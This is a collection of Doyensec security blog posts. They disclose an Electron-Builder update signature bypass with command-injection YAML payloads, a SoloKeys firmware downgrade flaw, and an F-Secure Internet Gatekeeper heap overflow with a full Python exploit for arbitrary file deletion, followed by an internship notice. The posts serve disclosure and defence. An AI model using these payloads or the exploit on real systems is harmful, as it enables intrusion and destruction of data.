© 2026 Doyensec LLC

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

This software is commonly used to build platform-specific packages for ElectronJs-based applications and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms).

As part of a security engagement for one of our customers, we reviewed the update mechanism implemented by Electron-Builder and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check, leading to remote command execution.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:



powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).
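The hash recalculation does not need the shell pipeline. Here is a minimal Python sketch, assuming the `sha512` field in latest.yml holds the base64-encoded raw SHA-512 digest (which is what the `shasum | xxd | base64` pipeline produces). The function name `sha512_base64` is ours and is not part of electron-builder.

```python
import base64
import hashlib


def sha512_base64(path, chunk_size=1 << 20):
    """Return the base64-encoded SHA-512 digest of the file at `path`."""
    digest = hashlib.sha512()
    with open(path, "rb") as handle:
        # Read in chunks so that large installers need not fit in memory.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return base64.b64encode(digest.digest()).decode("ascii")
```

Calling `sha512_base64("maliciousupdate.exe")` should yield the value to place in the `sha512` fields of the update definition.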

For instance, a malicious update definition would look like:

    version: 1.2.3
    files:
      - url: v'ulnerable-app-setup-1.2.3.exe
        sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
        size: 44653912
    path: v'ulnerable-app-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
    releaseDate: '2019-11-20T11:17:02.627Z'

When a similar latest.yml is served to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, an attacker may leverage the lack of escaping to pull off a trivial command injection:

    version: 1.2.3
    files:
      - url: v';calc;'ulnerable-app-setup-1.2.3.exe
        sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
        size: 44653912
    path: v';calc;'ulnerable-app-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
    releaseDate: '2019-11-20T11:17:02.627Z'
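The effect of the missing escaping can be reproduced by building the same command string outside of Electron. The sketch below is illustrative Python, not electron-builder code, and `build_command`, `quote_for_powershell` and `build_command_escaped` are hypothetical names. It relies on PowerShell's rule that a quote inside a single-quoted string is escaped by doubling it. It also assumes, to the best of our understanding, that PowerShell accepts typographic single quotes as string delimiters, so those are doubled too.

```python
TEMPLATE = "Get-AuthenticodeSignature {} | ConvertTo-Json -Compress"

# ASCII apostrophe plus the typographic variants that PowerShell is assumed
# to treat as single-quote delimiters.
SINGLE_QUOTES = "'\u2018\u2019\u201a\u201b"


def build_command(temp_update_file):
    """Mimic the vulnerable template: the path is interpolated unescaped."""
    return TEMPLATE.format("'" + temp_update_file + "'")


def quote_for_powershell(value):
    """Return `value` as a PowerShell single-quoted string literal."""
    escaped = "".join(ch * 2 if ch in SINGLE_QUOTES else ch for ch in value)
    return "'" + escaped + "'"


def build_command_escaped(temp_update_file):
    """Same template, but the path is quoted before interpolation."""
    return TEMPLATE.format(quote_for_powershell(temp_update_file))


if __name__ == "__main__":
    for name in ("v'ulnerable-app-setup-1.2.3.exe",
                 "v';calc;'ulnerable-app-setup-1.2.3.exe"):
        print(build_command(name))          # unbalanced quote or injected command
        print(build_command_escaped(name))  # file name stays inside one literal
```

Escaping is only a partial answer. Passing the path to the child process out of band, rather than interpolating it into a script, would avoid the quoting problem altogether.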

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.

An attacker could leverage this fail-open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.
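The fail-open behaviour comes from treating every error path as a successful verification (`resolve(null)` in the snippet quoted earlier). A fail-closed alternative could look roughly like the sketch below. It is written in Python for brevity and is not the project's code: `get_signature_info` is a hypothetical callable standing in for the PowerShell invocation, and the dictionary keys are assumptions.

```python
def is_update_trusted(get_signature_info, publisher_names):
    """Fail-closed check: any error or unexpected output rejects the update.

    `get_signature_info` is a hypothetical callable returning a dict such as
    {"Status": 0, "CommonName": "Example Corp"} or raising on failure.
    """
    try:
        info = get_signature_info()
    except Exception:
        # An error while checking is not evidence that the file is valid.
        return False
    if not isinstance(info, dict) or info.get("Status") != 0:
        return False
    return info.get("CommonName") in publisher_names
```

With this shape, a parse error triggered by a crafted file name leads to a rejected update instead of an accepted one.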

Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows.

On February 15th, 2020, we were made aware that the vulnerability discussed in this blog post had been discussed on Twitter. On February 24th, 2020, we were informed by the package’s maintainer that the issue was resolved in release v22.3.5. While the patch mitigates the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and the maintainer’s lack of responsiveness.

Electron Forge represents a potential well-maintained substitute, which takes advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since Squirrel.Windows doesn’t implement signature validation either, for robust signature validation on Windows consider shipping the app to the Windows Store or incorporating minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exist in Electron-Builder.

Standard security hardening and monitoring of the update server is important, as full access to such a system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.
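As a rough illustration of the pinning idea, the following Python sketch compares the SHA-256 fingerprint of a DER-encoded server certificate with a value shipped inside the application. The function name and the way the pin is stored are assumptions. Pinning is meant to complement normal certificate validation, not to replace it.

```python
import hashlib
import hmac


def matches_pin(der_certificate, pinned_sha256_hex):
    """Compare a certificate's SHA-256 fingerprint with a pinned hex value."""
    fingerprint = hashlib.sha256(der_certificate).hexdigest()
    # Constant-time comparison; the pin is normalised to lowercase hex.
    return hmac.compare_digest(fingerprint, pinned_sha256_hex.lower())
```

In Python, the DER bytes of the peer certificate can be obtained from an established TLS socket with `getpeercert(binary_form=True)`.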

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

This blogpost summarizes the result of a cooperation between SoloKeys and Doyensec, and was originally published on SoloKeys blog by Emanuele Cesena. You can download the full security auditing report here.

We engaged Doyensec to perform a security assessment of our firmware, v3.0.1 at the time of testing. During a 10 person-day project, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and fixed in v3.1.0. The full report is available with all details, while in this post we’d like to give a high-level summary of the engagement and findings.

One of the first requests we received after Solo’s Kickstarter was to run an independent security audit. At the time we didn’t have resources to run it and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community.

Recently, we shared that we’re building a new model of Solo based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). As most of our energies will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community.

Therefore we thought this was a good time for a security analysis.

We asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet.

The security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks from Jan 21 to Jan 31, 2020.

In short, he found a downgrade attack where he was able to “upgrade” a firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities.

Practically speaking, however, running such an attack against a Solo key requires either physical access to the key or, if attempted on a malicious site, an explicit user acknowledgement on the WebAuthn window.

This means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools.

Also note that our firmware is digitally signed and this downgrade attack couldn’t bypass our signature verification. Therefore a possible attacker can only install one of our twenty-ish previous releases.

Needless to say, we took the vulnerability very seriously and fixed it immediately.



This was the offending code. And this is the patch, which should help explain what happened.





Solo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the keys, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant as this attack only allows installing older signed releases.

The new firmware is written to the keys in chunks. At every write, a pointer to the last written address is updated, so that eventually it will point to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order.

As an example, suppose the key is running v3.0.1, and take an old firmware, say v3.0.0. Search it for four bytes which, when interpreted as a version number, appear to be greater than v3.0.1. First, send the whole 3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, encoding version 3.0.0.

Then, write again the four chosen bytes at their original location. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! Here is a fully working proof-of-concept.
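The logic of the attack and of the fix can be replayed with a toy model. The sketch below is a simplified Python simulation, not the Solo bootloader. The flash size, the encoding of the version as a little-endian integer, and all names except `last_written_app_address` are assumptions made for illustration.

```python
import struct

FLASH_SIZE = 64  # toy firmware size in bytes (assumption)


def version_at(flash, end_address):
    """Interpret the 4 bytes ending at `end_address` as a version number."""
    if end_address < 4:
        return 0
    return struct.unpack("<I", bytes(flash[end_address - 4:end_address]))[0]


class ToyBootloader:
    def __init__(self, installed_version, enforce_order):
        self.flash = bytearray(FLASH_SIZE)
        self.installed_version = installed_version
        self.enforce_order = enforce_order
        self.last_written_app_address = 0

    def write_chunk(self, address, data):
        # The patched behaviour: refuse writes that go back to earlier addresses.
        if self.enforce_order and address < self.last_written_app_address:
            raise ValueError("chunks must be written in ascending order")
        self.flash[address:address + len(data)] = data
        self.last_written_app_address = address + len(data)

    def finish(self):
        """Accept the image only if its apparent version is newer."""
        candidate = version_at(self.flash, self.last_written_app_address)
        return candidate > self.installed_version


def build_old_firmware():
    image = bytearray(FLASH_SIZE)
    image[20:24] = struct.pack("<I", 37)  # bytes that happen to look like a high version
    image[-4:] = struct.pack("<I", 0)     # the real, older version at the end
    return bytes(image)


if __name__ == "__main__":
    old = build_old_firmware()
    boot = ToyBootloader(installed_version=1, enforce_order=False)
    boot.write_chunk(0, old)
    print("plain downgrade accepted:", boot.finish())
    boot.write_chunk(20, old[20:24])  # rewrite four bytes in place
    print("after re-writing 4 bytes:", boot.finish())
```

The flash contents are unchanged by the second write. Only the pointer moves, which is why enforcing ascending writes is enough to close the gap in this model.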

The researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and cause a crash of our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework.

The fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor we would be happy to share details and examples.

In summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional question or for helping with fuzzing of tinycbor feel free to reach out on Twitter @SoloKeysSec or at hello@solokeys.com.

We would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to check their website, and oh, they’re also launching a game soon. Yes, a mobile game with a hacking theme!

This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.

All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.

An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.

The original affected package has the following SHA256 hash:

1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26.

Proceed with the installation:

    yum install glibc.i686
    rpm -i <fsigkbin>.rpm

Now you can use GHIDRA/IDA or your favorite disassembler/decompiler to start reverse engineering Internet Gatekeeper!

As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.

F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.

The fact that it was written in C/C++ led us down the road of looking for memory corruption vulnerabilities, which are common in these languages.

It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron, which uses Radamsa as the underlying engine. Fuzzotron has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid POST request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as a fuzzing seed.

When analyzing the input mutated by Radamsa we could quickly see that the root cause of the vulnerability revolved around the Content-Length header. The generated test that crashed the software had the following header value: Content-Length: 21487483844. This suggests an overflow due to incorrect integer math.

After running the test through gdb we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.

To demonstrate the issue we’re going to send a POST request to port 9012 where the admin panel is running. We set a very big Content-Length header value.

    POST /submit HTTP/1.1
    Host: 192.168.0.24:9012
    Content-Length: 21487483844

    AAAAAAAAAAAAAAAAAAAAAAAAAAA

The application will parse the request and execute the fs_httpd_get_header function to retrieve the content length. Later, the content length is passed to the function strtoul (String to Unsigned Long).

The following pseudo code provides a summary of the control flow:

    content_len = fs_httpd_get_header(header_struct, "Content-Length");
    if ( content_len ){
        content_len_new = strtoul(content_len, 0, 10);
    }

What exactly happens in the strtoul function can be understood by reading the corresponding man pages. The return value of strtoul is an unsigned long int, which can have a largest possible value of 2^32-1 (on 32 bit systems).

The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).

As our provided Content-Length is too large for an unsigned long int, strtoul will return the ULONG_MAX value which corresponds to 0xFFFFFFFF on 32 bit systems.

So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request function tries to issue a malloc request to make room for our data, it first adds 1 to the content length (content_len_new) and then calls malloc.

This can be seen in the following pseudo code:

// fs_malloc == malloc

data_by_post_on_heap = fs_malloc(content_len_new + 1)

This causes a problem as the value 0xFFFFFFFF + 1 will cause an integer overflow, which results in 0x00000000. So the malloc call will allocate 0 bytes of memory.
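The arithmetic can be checked with a few lines of Python that emulate 32-bit unsigned behaviour. This is a sketch of the reasoning rather than the product's code. `strtoul32` only approximates strtoul for plain non-negative decimal strings, and `safe_alloc_size` with its `limit` parameter is a hypothetical bounds check, not the vendor's fix.

```python
ULONG_MAX_32 = 0xFFFFFFFF  # largest unsigned long on a 32-bit system


def strtoul32(text):
    """Approximate strtoul(text, 0, 10) on 32-bit: saturate at ULONG_MAX."""
    return min(int(text, 10), ULONG_MAX_32)


def add_u32(a, b):
    """Unsigned 32-bit addition with wraparound."""
    return (a + b) & ULONG_MAX_32


def safe_alloc_size(content_length, limit=1 << 20):
    """Return the buffer size to allocate, or None to reject the request."""
    if content_length > limit:
        return None
    return content_length + 1


if __name__ == "__main__":
    content_len_new = strtoul32("21487483844")
    print(hex(content_len_new))              # saturated header value
    print(hex(add_u32(content_len_new, 1)))  # size actually passed to malloc
    print(safe_alloc_size(content_len_new))  # rejected by the bounds check
```

The allocation size wraps to zero while the length later used for reading stays at the saturated value, which is the mismatch the exploit relies on.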

malloc does allow invocations with a 0-byte argument. When malloc(0) is called with glibc, a valid pointer to the heap will be returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can also be read in the man pages:

The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().

If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read.

    // content_len_new is without the addition of 0x1.
    // so content_len_new == 0xFFFFFFFF
    if(content_len_new){
        int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
    }

During the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.

In summary, we can leverage malloc’s chunks of size 0x10 with an overflow of arbitrary data to overwrite existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true, and then subsequently spraying the heap with the full path of the file we want to delete. The Internet Gatekeeper internal handler has a decontruct_http method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal, which is sufficient to demonstrate the severity of the issue.

    from pwn import *
    import time
    import sys


    def send_payload(payload, content_len=21487483844, nofun=False):
        r = remote(sys.argv[1], 9012)
        r.send("POST / HTTP/1.1\n")
        r.send("Host: 192.168.0.122:9012\n")
        r.send("Content-Length: {}\n".format(content_len))
        r.send("\n")
        r.send(payload)
        if not nofun:
            r.send("\n\n")
        return r


    def trigger_exploit():
        print "Triggering exploit"
        payload = ""
        payload += "A" * 12             # Padding
        payload += p32(0x1d)            # Fast bin chunk overwrite
        payload += "A"* 488             # Padding
        payload += p32(0xdda00771)      # Address of payload
        payload += p32(0xdda00771+4)    # Junk
        r = send_payload(payload)


    def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
            print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
            exit()
        massage_heap(sys.argv[2])
        time.sleep(1)
        trigger_exploit()
        print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

Current exploit reliability is around 60-70% of the total attempts, and our exploit PoC relies on the specific machine as listed in the prerequisites.

Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to info@doyensec.com ;)

This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.

“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler



At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.

Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.

The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.

Day one is important. Interns will be responsible for setting up their Doyensec provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work.

While the internship is considered full time over the course of 2-3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results and our approach to the internship is no different.

“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval

Work days are generally grouped into two categories:

a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.

b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.

Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:

What did you learn during your internship?

“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”

Have you improved your skillset?

“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”

Will the internship have an impact on your career?

“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”

The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe.

What do we offer:

Our perfect candidate:

In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.

Do you want to join Doyensec as an intern? Apply via our careers portal!